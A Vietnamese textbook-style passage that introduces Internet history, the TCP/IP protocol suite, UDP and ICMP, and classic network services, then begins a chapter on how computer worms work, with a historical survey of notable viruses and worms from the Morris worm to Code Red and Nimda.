TỔNG QUAN VỀ INTERNET
Giới thiệu về Internet
Internet là một mạng lưới toàn cầu, kết nối hàng triệu máy tính trên khắp thế giới Đây là hệ thống các mạng liên kết với nhau, tạo nên một nền tảng khổng lồ cho việc trao đổi thông tin.
Internet có nguồn gốc từ mạng ARPANET, được xây dựng bởi Cục các dự án nghiên cứu tiên tiến (ARPA) vào tháng 6/1968 nhằm kết nối các trung tâm máy tính lớn trên toàn liên bang Vào mùa thu năm 1969, bốn trạm đầu tiên đã được kết nối thành công, đánh dấu sự ra đời của ARPANET với giao thức truyền thông ban đầu là Network Control Protocol (NCP) Nhằm đáp ứng nhu cầu thực tế, các nhà thiết kế ARPANET đã nhận ra cần phải xây dựng một “mạng của các mạng máy tính” Đến giữa những năm 70, bộ giao thức TCP/IP được Vint Cerf và Robert Kahn phát triển, ban đầu tồn tại song song với NCP và hoàn toàn thay thế NCP vào năm 1983.
Vào năm 1984, Bộ Quốc phòng Mỹ đã chia ARPANET thành hai phần: ARPANET cho nghiên cứu khoa học và Milinet cho quân đội Một bước ngoặt quan trọng trong lịch sử Internet diễn ra khi Ủy ban Khoa học Quốc gia Mỹ (NSF) tài trợ cho 5 trung tâm siêu máy tính và kết nối chúng thành một mạng xương sống Năm 1987, mạng NSFnet ra đời với tốc độ truyền dữ liệu nhanh hơn, cho phép kết nối 7 mạng mới với các trung tâm siêu máy tính, đánh dấu sự phát triển của mạng xương sống.
NFSnet và các mạng vùng đã đóng vai trò quan trọng trong việc thúc đẩy sự phát triển của Internet Sự hình thành của một xa lộ thông tin đã thu hút sự tham gia của nhiều trường đại học, viện nghiên cứu, tổ chức chính phủ và doanh nghiệp trong cộng đồng Internet Địa lý của Internet cũng mở rộng nhanh chóng ra ngoài biên giới Mỹ, trở thành một mạng lưới toàn cầu phục vụ hàng chục triệu người dùng trên khắp thế giới.
Mặc dù không có cơ quan quản lý tối cao cho toàn bộ mạng Internet, Hiệp hội Internet (ISOC) đóng vai trò điều phối các hoạt động của Internet trên toàn cầu Là một tổ chức phi lợi nhuận, ISOC tập hợp các cá nhân và tổ chức để khuyến khích và phát triển việc sử dụng Internet Ban kiến trúc Internet (IAB) là cơ quan lãnh đạo cao nhất của ISOC, thường xuyên họp để xem xét các chuẩn và quy định liên quan đến việc cấp phát tài nguyên Trong khuôn khổ IAB, Tiểu ban đặc nhiệm kỹ thuật Internet (IETF) chịu trách nhiệm về các vấn đề kỹ thuật và tác nghiệp của Internet, và khi có vấn đề quan trọng, IETF sẽ thành lập nhóm làm việc để nghiên cứu Các cuộc họp của IETF mở cửa cho mọi người tham gia và đóng góp vào các nhóm làm việc.
Việc phân phối địa chỉ cho các máy tính kết nối Internet ban đầu do ISOC đảm nhiệm, nhưng từ năm 1992, do sự phát triển nhanh chóng của Internet, nhiệm vụ này đã được chuyển giao cho các trung tâm thông tin mạng (NIC) khu vực APNIC, NIC khu vực Châu Á Thái Bình Dương, có trụ sở tại Tokyo, Nhật Bản, đã được thành lập để quản lý công việc này ISOC khuyến khích việc thành lập các NIC quốc gia, và hiện nay Việt Nam đã thành lập VNNIC, cơ quan chịu trách nhiệm điều hành và phân phối địa chỉ cho các máy tính trong nước.
1.1.3 Các dịch vụ mức ứng dụng ban đầu trên Internet
Thư điện tử (E-mail) cho phép người dùng gửi thông điệp đến bất kỳ ai trên toàn cầu chỉ cần có địa chỉ E-mail Người dùng cũng có thể tham gia vào các nhóm thảo luận về nhiều chủ đề khác nhau hoặc tạo ra nhóm mới theo sở thích cá nhân.
Truyền file (File Transfer) cho phép người dùng tải xuống các chương trình phần mềm mới như tiện ích nén file, chương trình diệt virus, trò chơi, hình ảnh hoặc âm thanh bất cứ lúc nào.
Truy nhập từ xa (Remote login) là một trong những ứng dụng thú vị nhất của Internet, cho phép người dùng kết nối và sử dụng máy tính ở xa như một trạm cuối.
Ngày nay, nhiều dịch vụ Internet đã được phát triển và ứng dụng Đó là :
Thư điện tử W.W.W (world – wide – web) FIP (File Transfer Protocol) Telnet
1.1.4 Dịch vụ mức mạng của Internet
Một lập trình viên phát triển ứng dụng trên Internet cần có cái nhìn sâu sắc hơn so với người dùng thông thường Tầng mạng Internet cung cấp hai loại dịch vụ chính mà các ứng dụng thường xuyên sử dụng.
Dịch vụ truyền không kết nối (Connectionless Paket Delivery Service) là phương thức truyền dữ liệu do các mạng chuyển mạch gói cung cấp, trong đó các gói tin được chuyển từ máy này sang máy khác dựa trên địa chỉ đích của chúng Một lợi thế của việc chia nhỏ gói tin là nếu một tuyến đường bị tắc nghẽn hoặc bị gián đoạn, các gói tin có thể được chuyển theo hướng khác, đảm bảo tính linh hoạt và hiệu quả trong việc truyền tải dữ liệu.
Dịch vụ truyền tin cậy (Reliable Stream Transport Service) là giải pháp lý tưởng cho các ứng dụng yêu cầu nhiều hơn chỉ truyền thông không kết nối, vì nó cung cấp khả năng tự động sửa lỗi và kiểm tra tính toàn vẹn của thông tin trên mạng.
Bộ giao thức TCP/IP
Để các máy tính trên Internet có thể giao tiếp, cần có các quy tắc và giao thức thống nhất, được gọi là giao thức Bộ giao thức chính mà Internet sử dụng là TCP/IP, bao gồm nhiều giao thức phối hợp để cung cấp phương tiện truyền thông Hai giao thức quan trọng nhất trong bộ này là TCP (Transmission Control Protocol) và IP (Internet Protocol), đóng vai trò cốt lõi trong việc định danh và truyền tải dữ liệu trên mạng.
Bộ giao thức TCP/IP cho phép các máy tính từ nhiều hãng sản xuất và hệ điều hành khác nhau giao tiếp hiệu quả, vượt xa dự kiến ban đầu Bắt đầu từ cuối những năm 1960 như một dự án nghiên cứu về mạng chuyển mạch gói, đến những năm 1990, TCP/IP đã trở thành phương thức kết nối mạng máy tính phổ biến nhất Hệ thống này được coi là mở, với định nghĩa và cài đặt công khai, tạo nền tảng cho Internet - một mạng diện rộng (WAN) kết nối hàng triệu máy tính toàn cầu.
Các giao thức mạng được tổ chức theo mô hình tầng, với mỗi tầng đảm nhận một vai trò khác nhau trong truyền thông Một bộ giao thức như TCP/IP là sự kết hợp của nhiều giao thức thuộc các tầng chức năng khác nhau TCP/IP thường được phân chia thành 4 tầng, như mô tả trong hình 1.1.
Chức năng của các lớp của bộ giao thức TCP/IP:
1 Lớp Link, đôi khi còn được gọi là lớp data _ link hoặc network interface, thường bao gồm trình điều khiển thiết bị trong hệ điều hành và card giao tiếp mạng tương ứng trong máy tính Chúng cùng nhau xử lý tất cả các chi tiết phần cứng của các giao tiếp vật lý với cable ( hoặc bất cứ kiểu phương tiện trung gian nào khác được sử dụng)
Application Telnet, FTP, e – mail, etc
Link Device driver and interface card
Hình 1.1: Bốn lớp của bộ giao thức TCP/IP
2 Lớp Network (đôi khi còn gọi là lớp liên mạng – internet) xử lý việc vận chuyển các gói tin qua mạng Ví dụ như dẫn đường cho các gói tin chẳng hạn IP (Internet Protocol), ICMP (Internet Control Message Protocol) và IGMP (Internet Group Management Protocol) cung cấp lớp mạng trong bộ giao thức TCP/IP
3 Lớp Transport cung cấp dòng dữ liệu giữa hai host cho lớp ứng dụng bên trên Trong bộ giao thức TCP/IP có hai giao thức Transport khác biệt nhau: TCP và UDP
1 TCP cung cấp dòng dữ liệu tin cậy giữa hai host Nó nhận dữ liệu đến từ các ứng dụng và chia thành các khúc (chunk) có kích thước thích hợp cho lớp network bên dưới, báo nhận các gói tin nhận được, thiết lập timeout để chắc chắn rằng một đầu cuối khác báo nhận các gói tin đã được gửi rồi, … Bởi vì lớp transport cung cấp dữ liệu tin cậy nên lớp ứng dụng có thể bỏ qua, không để ý đến những chi tiết này
2 UDP lại khác hẳn, cung cấp cho lớp ứng dụng các dịch vụ đơn giản hơn nhiều Nó chỉ gửi các gói dữ liệu gọi là datagram từ host này tới host khác, mà không đảm bảo rằng các gói tin đó sẽ đến được đích Các chức năng đảm bảo tin cậy chỉ có thể được thêm vào ở lớp ứng dụng
Do đó, mỗi loại giao thức này được sử dụng bởi các ứng dụng khác nhau
4 Lớp Application xử lý các chi tiết của một ứng dụng đặc trưng Có nhiều ứng dụng TCP/IP thông dụng mà hầu hết các cài đặt cung cấp:
- Telnet cho đăng nhập từ xa
- FTP (File Transfer Protocol) giao thức truyền tệp
- SMTP (Simple Mail Transfer Protocol) cho thư điện tử
- SNMP (Simple Network Mannagement Protocol) và rất nhiều các ứng dụng khác nữa
Chúng ta có thể so sánh kiến trúc 4 tầng của TCP/IP với kiến trúc 7 tầng của mô hình tham chiếu OSI ( Open System Interconnection)
Presentation Layer Session Layer Transport Layer Transport Layer
Data link Layer Link Layer
Nếu có hai host trong một mạng cục bộ (Local Area Network – LAN), như một Ethernet chẳng hạn, cùng chạy FTP, hình 1.2 chỉ ra các giao thức liên quan:
Các tiến Xử lý các
FTP protocol trình người chi tiết
FTP server dùng ứng dụng Transport
Hình 1.2: Hai host trên một LAN cùng chạy FTP
Hai ứng dụng chính trong mạng là FTP client và FTP server, trong đó server cung cấp dịch vụ truy cập tệp cho client Tương tự, trong ứng dụng đăng nhập từ xa như Telnet, server cho phép client truy cập vào các host của nó.
Mỗi lớp trong mô hình mạng có một hoặc nhiều giao thức để giao tiếp với lớp ngang hàng của nó Ví dụ, một giao thức cho phép hai lớp TCP liên lạc với nhau, trong khi một giao thức khác cho phép hai lớp IP tương tác.
Trong hình 1.2, lớp ứng dụng thường là tiến trình của người dùng, trong khi ba lớp thấp hơn thường được cài đặt trong nhân (kernel) của hệ điều hành Mặc dù không phải là yêu cầu bắt buộc, nhưng đây là cách tổ chức điển hình, đặc biệt trong hệ điều hành Unix.
Lớp ứng dụng trong hình 1.2 tập trung vào các chi tiết liên quan đến ứng dụng mà không chú ý đến việc truyền tải dữ liệu qua mạng Ngược lại, ba lớp bên dưới không nắm rõ thông tin về ứng dụng nhưng lại đảm nhiệm toàn bộ các khía cạnh của quá trình truyền thông.
Chúng ta thấy bốn giao thức được thể hiện ở bốn tầng khác nhau: FTP thuộc tầng ứng dụng, TCP thuộc tầng vận chuyển, IP thuộc tầng mạng và Ethernet thuộc tầng liên kết Bộ giao thức TCP/IP bao gồm các giao thức này, trong đó TCP và IP đóng vai trò quan trọng trong việc truyền tải dữ liệu.
IP chỉ là một trong nhiều giao thức trong bộ giao thức mạng Hình vẽ bên dưới minh họa rõ ràng các giao thức liên quan, cho thấy sự đa dạng và phức tạp của chúng.
FTP (File Transfer Protocol): Giao thức truyền tệp cho phép người dùng lấy hoặc gửi tệp tới một máy khác
Telnet là một giao thức đăng nhập từ xa, cho phép người dùng kết nối và làm việc với hệ thống máy tính ở xa như thể họ đang sử dụng một trạm cuối trực tiếp Người dùng có thể đăng nhập từ trạm làm việc của mình qua mạng, tạo ra trải nghiệm làm việc liền mạch với thiết bị từ xa.
SMTP (Simple Mail Transfer Protocol): Giao thức thư tín điện tử
DNS (Domain Name Server): Dịch vụ tên miền cho phép nhận ra máy tính từ một tên miền thay cho chuỗi địa chỉ Internet khó nhớ
SNMP (Simple Network Management Protocol): Giao thức quản trị mạng cung cấp những công cụ quản trị mạng
RIP (Routing Internet Protocol): Giao thức dẫn đường động
ICMP (Internet Control Message Protocol): Giao thức điều khiển thông báo
UDP ( User Datagram Protocol): Giao thức truyền thông không kết nối cung cấp dịch vụ truyền không tin cậy nhưng tiết kiệm cho phí truyền
TCP (Transmission Control Protocol): Giao thức có kết nối cung cấp dịch vụ truyền thông tin cậy
IP (Internet Protocol): Giao thức Internet chuyển giao các gói tin qua mạng tới đích
ARP (Address Resolution Protocol): Giao thức chuyển địa chỉ TCP/IP thành địa chỉ vật lý của các thiết bị mạng
Kiến trúc của TCP/IP
Giao thức không kết nối
Giao thức UDP cho phép các ứng dụng truy cập trực tiếp vào gói tin dịch vụ chuyển giao, tương tự như giao thức IP Nó hỗ trợ việc trao đổi thông tin qua mạng với ít thông tin điều khiển, nhưng là giao thức không kết nối và kém tin cậy do thiếu cơ chế kiểm tra tính chính xác của dữ liệu truyền.
Mỗi gói thông tin UDP, gọi là Datagram, bao gồm hai phần: header và data Trong đó, phần header chứa thông tin quan trọng như địa chỉ cổng nguồn, địa chỉ cổng đích, độ dài gói và checksum.
1.3.2 Phân kênh và hợp kênh
Phân kênh và hợp kênh là quá trình lựa chọn các ứng dụng trong số nhiều tiến trình sử dụng giao thức UDP, nhằm xác định ứng dụng phù hợp với gói thông tin đang được chuyển đến.
Cơ chế cổng (Port mechanism) gắn mỗi ứng dụng với một số hiệu cổng (Port number), giúp xác định nguồn gốc của thông tin Mỗi gói dữ liệu mà ứng dụng gửi đi đều chứa trường SOURCE PORT, đảm bảo việc truyền tải thông tin chính xác và hiệu quả.
Tại nơi nhận, dựa vào thông tin trong trường DESTINATION PORT mà gói tin đó được truyền đến cổng tương ứng với ứng dụng Ví dụ mọi bản
UDP: Demultiplexing Based on Port
IP Layer UDP Datagram arrives
TCP/IP đều có dịch vụ FTP (File Transfer Protocol) gắn với cổng 21 và TFTP (Trivial File Transfer Protocol) gắn với cổng 69 của UDP
Việc sử dụng các port number cũng có nhiều cách
Dùng những cổng dành riêng cho từng ứng dụng đã được đăng ký trước (Well – known port assigment)
Một port number sẽ được sinh ra khi có một ứng dụng đòi hỏi (Dynamic binding)
Cách tiếp cận kết hợp (Hybrid) sử dụng phân bổ cổng đã được biết đến cho một số số cổng, đồng thời cho phép định nghĩa các số cổng khác khi cần thiết Các số cổng phổ biến của UDP thường được dành từ 1 đến 255, trong khi một số hệ điều hành như 4.3 BSD UNIX còn dành cổng đến số 1023 Các số cổng có thể sử dụng được bắt đầu từ 1024 trở lên.
Một số cổng UDP dành riêng
15 Who is up or NETSTAT
69 Trivial File Tranfer Protocol ( TFTP)
Có một số lý do để người lập trình ứng dụng lựa chọn UDP như một dịch vụ giao vận:
Khi truyền một số lượng lớn gói tin nhỏ, thông tin cho việc kết nối và sửa lỗi có thể vượt quá đáng kể so với lượng dữ liệu cần truyền Trong tình huống này, giao thức UDP trở thành giải pháp hiệu quả nhất.
Các ứng dụng "Query - Response" rất thích hợp với giao thức UDP, vì câu trả lời có thể xác nhận một câu hỏi đã được gửi Nếu không nhận được phản hồi trong một khoảng thời gian nhất định, ứng dụng chỉ cần gửi một câu hỏi mới.
Một số ứng dụng đã tự nó cung cấp công nghệ riêng để chuyển giao thông tin tin cậy, và không đòi hỏi dịch vụ này của transport layer
Giao thức điều khiển truyền tin
Giao thức điều khiển truyền tin (ICMP), được định nghĩa trong RFC 792, sử dụng gói tin IP để truyền thông báo nhằm thực hiện các chức năng điều khiển, thông báo lỗi và cung cấp thông tin cho TCP/IP ICMP thường gửi thông điệp khi một gói tin không thể đến đích, khi một gateway không còn đủ bộ nhớ để nhận thêm gói tin, hoặc khi một gateway hướng dẫn máy tính sử dụng một gateway khác để truyền thông tin theo con đường tối ưu hơn.
Mặc dầu mỗi thông báo ICMP có môt kiểu định dạng riêng của nó, song các thông báo đều chưa 3 trường đầu tiên giống nhau:
TYTE: Định nghĩa thông báo đi sau
CODE: Cung cấp thông tin thêm về thông báo
CHECKSUM: Chứa checksum của thông báo
Type Field ICMP Message Type
1.4.1 Điều khiển dòng dữ liệu
Khi trạm nguồn truyền dữ liệu quá nhanh, trạm đích không kịp xử lý thông tin Do đó, trạm đích hoặc thiết bị dẫn đường sẽ gửi thông báo yêu cầu trạm nguồn tạm dừng việc truyền tải dữ liệu.
Khi không xác định được trạm đích, gateway sẽ gửi thông báo lỗi "Destination Unreachable" về trạm nguồn Nếu có sự không khớp với số hiệu cổng, trạm đích sẽ phản hồi bằng thông báo lỗi cho trạm nguồn, chi tiết về cổng sẽ được đề cập trong phần giao thức tầng giao vận.
Một gateway sẽ gửi thông báo định hướng lại cho trạm gửi, yêu cầu sử dụng một gateway khác nếu gateway đó phù hợp hơn Tình huống này xảy ra khi trạm gửi kết nối vào mạng có hơn hai gateway.
Khi máy tính B gửi thông tin đến máy C, nếu thông điệp đi qua gateway 1, nó sẽ cần được chuyển hướng qua gateway 2 Tuy nhiên, nếu máy tính trên mạng X.25 muốn gửi thông báo đến máy tính trên mạng Token Ring, quá trình này không cần thiết, vì gateway 1 đã kết nối trực tiếp với mạng Token Ring.
1.4.4 Kiểm tra trạm làm việc
Khi một máy tính cần kiểm tra sự tồn tại và hoạt động của máy khác, nó sẽ gửi thông báo Echo Request Máy đích nhận thông báo này và phản hồi bằng cách gửi lại Echo Reply Lệnh ping trong hệ điều hành UNIX sử dụng các thông báo này để thực hiện kiểm tra kết nối.
Các dịch vụ mạng
Dịch vụ WEB, hay còn gọi là WWW, sử dụng ngôn ngữ đánh dấu siêu văn bản HTML để tạo ra các trang thông tin đa phương tiện, bao gồm văn bản, hình ảnh, âm thanh và dữ liệu Dịch vụ này hoạt động theo mô hình Client/Server, cho phép người dùng truy cập và tương tác với nội dung trực tuyến một cách hiệu quả.
Dịch vụ truyền file FTP là một trong những phương thức phổ biến để chuyển tải dữ liệu giữa các máy chủ và máy khách trên mạng Các loại file có thể bao gồm văn bản, hình ảnh, video, thư viện, và phần mềm ứng dụng miễn phí hoặc thử nghiệm Giao thức FTP cho phép truyền file mà không bị ảnh hưởng bởi vị trí địa lý hay hệ điều hành của các máy.
1.5.3.Dịch vụ truy nhập từ xa(Telnet)
Telnet cho phép người dùng đăng nhập từ xa vào một máy chủ như thể họ đang sử dụng một đầu cuối trực tiếp kết nối với máy chủ đó.
1.5.4 Dịch vụ tra cứu theo chỉ mục
Dịch vụ tra cứu theo chỉ mục Gopher là một hệ thống tìm kiếm thông tin theo chủ đề, sử dụng các thực đơn để dễ dàng truy cập Máy chủ Gopher không chỉ lưu trữ tài liệu mà còn cung cấp các chỉ dẫn kết nối đến các Gopher khác Người dùng có thể truy cập và tải xuống các file văn bản, hình ảnh, đồ họa và âm thanh thông qua các client của Gopher.
Dịch vụ nhóm tin Usenet là mạng nhóm tin lớn nhất thế giới, với hàng ngàn máy chủ liên kết để truyền đạt tin tức Đây là môi trường lý tưởng cho các cuộc tranh luận và trao đổi thông tin về các chủ đề mà người dùng quan tâm Khác với danh sách thư điện tử, nơi mà thư được gửi đến từng thành viên riêng lẻ, Usenet cho phép người dùng gửi thông tin đến một máy chủ chứa tin Người sử dụng có thể đặt câu hỏi, chia sẻ ý kiến, và gửi thông báo hoặc tài liệu liên quan đến các chủ đề thảo luận.
1.5.6 Dịch vụ tìm kiếm thông tin diện rộng
Dịch vụ WAIS (Wide Area Information Service) là một công cụ tìm kiếm thông tin trực tuyến, cho phép người dùng tìm kiếm các tệp dữ liệu dựa trên chuỗi đề mục lừa chọn và xâu ký tự xác định trước.
1.5.7 Dịch vụ tìm kiếm tên tệp
Dịch vụ tìm kiếm tên tệp Archie là một hệ thống máy chủ lưu trữ địa chỉ của nhiều máy chủ FTP vô danh khác Những máy chủ FTP này chứa thông tin về các file trên các máy chủ công cộng và được cập nhật liên tục Các máy chủ Archie sử dụng giao thức FTP để tải xuống danh sách file từ các host công cộng và cập nhật thông tin này vào cơ sở dữ liệu của mình.
Người dùng có thể truy cập máy chủ Archie bằng cách kết nối trực tiếp qua Telnet và sử dụng các lệnh của Archie, hoặc kết nối gián tiếp qua email với các lệnh cần thiết, và Archie sẽ gửi kết quả qua email cho người dùng.
Dịch vụ IRC (Internet Relay Chat) là một phương tiện giao tiếp "thời gian thực" qua mạng, cho phép người dùng trao đổi thông tin một cách riêng tư hoặc tạo "kênh mở" để nhiều người cùng tham gia Ngoài việc trò chuyện bằng lời, người dùng còn có thể gửi file như hình ảnh, chương trình, tài liệu và nhiều loại nội dung khác.
1.5.9 Dịch vụ thư điện tử
Dịch vụ thư điện tử (Email) là dịch vụ quan trọng và phổ biến nhất trên
Internet nổi bật với tính tiện dụng, và thư điện tử là một dịch vụ không yêu cầu kết nối trực tiếp giữa máy gửi và máy nhận, mà hoạt động theo kiểu "lưu và chuyển tiếp" Thư điện tử được chuyển từ máy này sang máy khác cho đến khi đến đích, trở thành một trong những dịch vụ phổ biến nhất trên Internet trước khi xuất hiện World Wide Web Qua dịch vụ này, người dùng có thể trao đổi thông điệp trên toàn cầu, và hầu hết các mạng diện rộng đều cài đặt dịch vụ này như một phần cơ bản khi gia nhập Internet Nhiều người sử dụng máy tính chỉ cần dịch vụ thư điện tử, sử dụng giao thức SMTP (Simple Mail Transfer Protocol) để thực hiện việc gửi thư.
Protocol) trong họ giao thức TCP/IP
Thư điện tử là phương thức trao đổi thông tin nhanh chóng và thuận tiện, cho phép người sử dụng gửi và nhận bản tin ngắn hoặc dài chỉ qua một kênh duy nhất Nhiều người ưa chuộng sử dụng thư điện tử thay vì các chương trình truyền tập tin thông thường Một đặc điểm nổi bật của dịch vụ thư điện tử là tính không tức thì (off-line), nghĩa là các yêu cầu gửi đi không cần phải được xử lý ngay lập tức.
Khi người dùng gửi thư, hệ thống sẽ lưu trữ bức thư cùng với thông tin về người gửi và người nhận trong một vùng gọi là spool Chương trình gửi thư chạy nền sẽ xác định địa chỉ IP của máy nhận và thiết lập kết nối Nếu kết nối thành công, thư sẽ được chuyển tới vùng spool của máy nhận; nếu không, chương trình sẽ ghi lại các thư chưa gửi và thử lại sau Nếu một thư không được gửi sau một thời gian dài (ví dụ 3 ngày), hệ thống sẽ trả lại bức thư cho người gửi.
Mọi thư điện tử trên Internet đều tuân theo một chuẩn nhất định, bao gồm phần header với địa chỉ người gửi và người nhận dưới dạng tên miền, cùng với phần nội dung thư Cả hai phần này đều sử dụng các ký tự ASCII chuẩn Thông tin trong phần header là yếu tố quyết định giúp thư được chuyển qua mạng và đến đúng đích.
Thư điện tử ban đầu chỉ được sử dụng để trao đổi thông báo giữa người dùng, nhưng theo thời gian, đã phát triển thành các dịch vụ thông tin phong phú hơn Những dịch vụ này sử dụng thư với cú pháp đặc biệt để thể hiện yêu cầu của người dùng, gửi đến các server Các server này sẽ phân tích nội dung, thực hiện yêu cầu và trả kết quả cho người yêu cầu qua thư điện tử.
Có hai server phổ biến trong hoạt động này là
Name server cung cấp dịch vụ tra cứu địa chỉ trên mạng
Archive server cho phép người sử dụng tìm kiếm và lấy về những tệp tin dùng chung
Bài viết này đã trình bày các khái niệm cơ bản về Internet và những ứng dụng của nó, nhằm cung cấp kiến thức nền tảng phục vụ cho các chương tiếp theo.
CHƯƠNG 2 : CÁCH THỨC HOẠT ĐỘNG CỦA SÂU
Tổng quan về sâu máy tính (worm)
2.1.1 Khái niệm sâu Để đơn giản ta nói là “sâu” mà không nói là sâu máy tính nhưng vẫn được hiểu là sâu máy tính
Sâu là một loại phần mềm độc hại (malware) có khả năng tự lây lan và phá hoại hoạt động của mạng máy tính Khác với virus, sâu tự động truyền từ máy tính này sang máy tính khác mà không cần sự can thiệp của con người, bằng cách kiểm soát các tính năng có thể truyền tải tệp hoặc thông tin Khi xâm nhập vào hệ thống, sâu có thể tự di chuyển và nhân bản với số lượng lớn, ví dụ, nó có thể gửi bản sao đến tất cả địa chỉ email trong danh bạ, khiến máy tính của họ cũng bị nhiễm Điều này tạo ra hiệu ứng lôi cuốn, làm quá tải lưu lượng mạng và làm chậm tốc độ truy cập Internet, gây khó khăn cho người dùng khi truy cập các trang web Sự phát tán nhanh chóng của sâu mới có thể dẫn đến tình trạng tắc nghẽn mạng, làm tăng thời gian chờ đợi cho người dùng.
Sâu máy tính và các virus khác phát tán nhƣ thế nào?
Tất cả các virus và nhiều sâu gần như không thể phát tán trừ khi bạn mở hoặc chạy một chương trình bị nhiễm
Nhiều virus nguy hiểm lây lan qua các tệp đính kèm trong email, mà bạn có thể nhận diện qua biểu tượng kẹp giấy hiển thị tên tệp Các loại tệp thường gặp bao gồm ảnh, tài liệu Microsoft Word và bảng tính Excel Virus sẽ được kích hoạt khi bạn mở tệp đính kèm, thường bằng cách nhấn đúp vào biểu tượng đó.
2.1.2 Sự phát triển của virus và worm
Virus và worm đã trải qua nhiều cải tiến trong quá trình phát triển Hiện nay, worm nổi bật với khả năng lây lan nhanh chóng và khả năng đánh cắp thông tin quan trọng.
Các thế hệ phát triển của virus, worm :
Thế hệ virus máy tính đầu tiên (1979 - đầu những năm 1990) chủ yếu bao gồm virus boot-sector, nhắm vào hệ điều hành MSDOS Các sâu máy tính đầu tiên, được gọi là "worm" bởi John Shoch và Joh Hupp tại Xerox PARC vào năm 1979, có khả năng tự sao chép và lây lan sang các máy tính khác, kể cả những máy nhàn rỗi Mặc dù ý tưởng tự sao chép đã được John Von Neumann phát triển từ năm 1949, Shoch và Hupp đã mở rộng khái niệm này Các worm thời kỳ này có giới hạn thời gian sống, và có thể bị tiêu diệt bằng cách gửi một gói dữ liệu đặc biệt Tuy nhiên, một số chương trình sâu vẫn hoạt động ngoài tầm kiểm soát, gây hại cho các máy chủ chỉ trong một đêm.
Năm 1983, Fred Cohen đã phát triển ý tưởng về chương trình virus máy tính đầu tiên khi còn là sinh viên tại USC Virus "Christmas Exec" là một trong những loại virus đầu tiên sử dụng email để phát tán, chỉ đơn giản là hiển thị một thẻ chúc mừng Giáng sinh trên màn hình máy tính bằng ngôn ngữ Script REXX Virus này gửi bản sao đến các địa chỉ trong hộp thư, khiến người nhận tin rằng đó là từ bạn bè và mở nó ra, từ đó tạo ra cơ chế lây lan qua email.
Vào ngày 2 tháng 10 năm 1988, một loại sâu máy tính nổi tiếng do sinh viên Robert Morris phát triển đã tê liệt 6.000 máy tính chỉ trong vài giờ Loại sâu này khai thác lỗ hổng của hệ điều hành UNIX trong chương trình gửi mail và sử dụng kỹ thuật tấn công tràn bộ đệm thông qua lỗi trong chương trình finger, một công cụ dùng để tìm hiểu thông tin về người dùng trên mạng.
Thế hệ thứ hai của virus máy tính, từ đầu những năm 1990 đến 1998, chứng kiến sự phát triển mạnh mẽ hơn của virus so với worm Thời kỳ này được đặc trưng bởi việc áp dụng các thuật toán mã hóa, dẫn đến sự xuất hiện của các hình thái virus mới Hình thái mới này lần đầu tiên xuất hiện vào năm 1989 tại Châu Âu, phản ánh sự ảnh hưởng của sự phát triển công nghệ máy tính đối với ý tưởng khai thác sâu và bộ công cụ.
Virus tự nhân bản bằng cách chèn số ngẫu nhiên vào một lượng lớn bytes trong thuật toán giải mã, trở thành thách thức từ năm 1992 với sự xuất hiện của nhiều loại virus như TPE và NED DAME Việc viết chương trình virus đã trở thành trào lưu, dẫn đến sự hình thành các nhóm phát triển công cụ, cho phép những người có kỹ năng lập trình cơ bản dễ dàng tạo ra virus Một ví dụ điển hình là virus Anna Kournikova, lây lan qua email với mã virus và hình ảnh tennis, sử dụng VBScript để tự sao chép vào tất cả địa chỉ trong hộp thư Outlook.
Vào năm 1995, virus macro lần đầu tiên xuất hiện, lây nhiễm vào file "normal.dot" của Word trên hệ điều hành Windows 95 Virus này tự động lây lan khi người dùng mở bất kỳ file Word nào khác Tuy nhiên, sau một thời gian, mọi người đã nắm được các biện pháp phòng ngừa, khiến cho virus macro trở nên khó phát triển hơn.
Thế hệ thứ ba: (tư 1999 đến 2000) : Những bức thư với số lượng lớn
Happy99 là một loại worm lây lan qua email, bắt đầu vào tháng 1 năm 1999 với file đính kèm Happy99.exe Khi được kích hoạt, worm này hiển thị hình ảnh pháo hoa trên màn hình với dòng chữ “New Year’s Day 1999” Tuy nhiên, điều đáng chú ý là nó đã bí mật thay đổi file WSOCK32.DLL, một file quan trọng cho kết nối Internet, bằng cách sử dụng một chương trình gọi là “con ngựa thành Trojan”, cho phép worm tự động tham gia vào quá trình truyền thông trên Internet File WSOCK32.DLL gốc đã bị đổi tên thành WSOCK32.SKA.
Tháng 3 năm 1999, virus macro Melissa đã phát tán rất nhanh lây nhiễm tới 100,000 máy tính trên toàn cầu trong vòng 3 ngày, nó cài đặt một bản ghi mới và tắt thư điện tử của nhiều công ty dùng Microsoft Exchange Server Nó bắt đầu gửi đến một nhóm mới trên mạng đến trang “alt.sex” với tài khoản và password đầy hứa hẹn Các tài liệu bị tấn công chứa các đoạn mã macro dùng các hàm của Word và outlook e-mail để nhân bản worm Tiếp theo virus tìm kiếm khóa Registry hiện thời chứa xâu “kwyjibo” Trong trường hợp không có khóa này thì nó sẽ tự gửi đi 50 bản với địa chỉ cần gửi được lấy trong hộp địa chỉ Outlook Hơn nữa nó còn lây nhiễm vào file normal.dot dùng macro VBA Như vậy là bất kỳ một tài liệu nào khi lưu lại sẽ chứa virus
Vào tháng 5 năm 2000, sâu máy tính LoveLetter đã gây ra sự lây lan mạnh mẽ và trở thành hình mẫu cho các loại worm e-mail sau này Nó gửi đi một thông điệp với tiêu đề "I love you", khiến người nhận bị thu hút và mở tệp đính kèm Tệp đính kèm này chứa mã VB Script, có khả năng tự động chạy trên Window Script Host, một phần mềm có sẵn trong các hệ điều hành Windows 98 và Windows.
Vào năm 2000, một loại worm đã xuất hiện, tự động sao chép vào thư mục hệ thống và thay đổi registry để tạo ra một file thi hành tự động khi máy tính khởi động Worm này lây nhiễm vào các file có phần mở rộng khác và nếu Outlook được cài đặt, nó sẽ tự động gửi một bức thư điện tử đến bất kỳ địa chỉ nào trong hộp địa chỉ Ngoài ra, worm còn tạo ra các kênh nối IRC, ăn cắp mật khẩu và thay đổi URL trên Internet Explorer đến một trang web ở Châu Á Trang web này cố gắng tải về một chú ngựa Trojan được thiết kế để thu thập mật khẩu của email từ một địa chỉ máy ở Châu Á.
Thế hệ thứ tƣ: (từ 2001 đến nay)
Thế hệ sâu máy tính hiện đại như Code Red và Nimda đã thể hiện sự lây lan mạnh mẽ, đánh dấu một hình thái mới của sâu truyền thống với những đặc điểm vượt trội hơn.
Tấn công theo kiểu hỗn hợp
Tìm cách lây vào các môi trường mới (Linux, mạng ngang hàng )
Tự cập nhật mã một cách tự động từ Internet
Các đoạn mã nhỏ nguy hiểm
Chống lại các phần mềm chống virus
